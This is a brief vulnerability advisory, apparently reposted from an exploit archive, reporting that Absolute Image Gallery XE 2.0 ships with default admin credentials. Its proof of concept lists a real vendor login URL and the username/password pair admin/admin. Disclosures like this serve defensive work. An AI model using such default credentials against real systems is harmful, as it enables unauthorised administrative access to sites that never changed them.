id: 11404
date: 03/23/2010
title: Absolute Image Gallery XE (Default  password Vulnerability)
author: Suliman
cves: 

===========================================================
Absolute Image Gallery XE (Default  password Vulnerability)
===========================================================

[~] Title     : Absolute Image Gallery XE (Default  password Vulnerability)
[~] Author    : EN|GMA7
[~]  By       : SuliMan
[~] Tested on : windows vista
[~] Homepage  : www.enigma7.net<http://www.enigma7.net>
[~] Contact   : s@enigma7.net<mailto:s@enigma7.net>
[~] Thanks to :( Zaid  - Mohammad  - Hussain )
[~] Software Link : http://www.scripts.com/asp-scripts/image-gallery-scripts/absolute-image-gallery-xe/
[~]Version    : 2.0


[~] POC:

http://www.xigla.com/absoluteig/xlaabsoluteig/login.asp

U:admin
P:admin




#  0day.today [2023-03-25]  #